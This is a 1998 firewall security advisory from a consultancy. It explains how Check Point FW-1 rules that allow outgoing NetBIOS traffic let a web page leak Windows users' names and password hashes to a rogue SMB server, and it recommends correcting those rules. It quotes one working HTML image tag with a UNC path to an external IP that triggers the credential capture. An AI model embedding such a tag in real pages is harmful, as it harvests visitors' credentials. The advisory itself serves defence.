How FW-1 is vulnerable when Iexplorer and Netscape are used on NT
stations or on W95 stations How FW-1 is vulnerable when Iexplorer and Netscape are used on NT
stations or on W95 stations
Author: Christian ALT go to security vulnerabilities looking for ports definition
Sites defended by FW-1 can be vulnerable to the new holes found in Netscape and Internet Explorer. Those sites must have one of the following misconfigurations to allow the agressor to gain information about the internal users (account name and password):
The rules stating:
Source ___ Destination ___ Services ___ Action
Internal hosts _ any _______ any ______ accept
The rule stating :
Source ___ Destination ___ Services ___ Action
Internal hosts _ any _______ nbname nbsession nbdatagram ______ accept
The principle of penetration follows:
An internal user accesses to an external web server. The downloaded document contains a link exploiting a vulnerability in the browser and opens a new connection to a rogue SMB server. This web pages contains an embedded image. The embedded images do not reside in the same directory as the web page. In fact, they reside on a SMB Lanman server (as opposed to an HTTP server).
HTML CAN FORCE AN SMB NEGOTIATION
In order for the client to download the images, the client needs to 'logon' to the Lanman server. Windows NT seems to do this without even asking the user for confirmation. Windows NT simply forwards the username and encrypted version of the user's password to the Lanman server. The Lanman server code has been modified slightly to record Usernames and "Hashed Passwords" of the victims. Also the code has been modified to supply the client with a fixed "Challenge seed value" for password encryption. (Thus making it less difficult to decode the client passwords in the future.)
This is the kind of HTML code leading to the penetration:
<p><font size="2" face="Arial"><img src="file://\\128.95.42.180\ietest\userpass.gif"> </font></p>
Why do we show that information
Several sites that we were auditing contained that kind of misconfiguration due to the belief that every thing initiated from an internal network is OK.
We also saw situations when the firewall is running under NT, the sys admin has a browser installed on the firewall for convenience. Since those misconfiguration are not isolated cases we want to make people aware of what can happen.
In the log file you will see accepted http transaction as well as nbname and nbsession and nbdatagram transactions.
Corrections
Modify any rule that would allow outgoing nbname, nbsession, nbdatagram service.
Credit to :
We do not have any credit for that information we followed what was indicated on the site http://www.ntshop.net. and applied it to the Firewall-1 environnement. So refer to it for the complet information.
Go 
Telecom and Logistics Associates SARL , Contact: calt@tla.ch
10, Rue des Savoises CH-1205 Geneva, Phone & fax +41 22 328 14 88
Copyright © 1998 Telecom and Logistics Associates SARL
All brand names are trademarks or registered trademarks of their respective holders.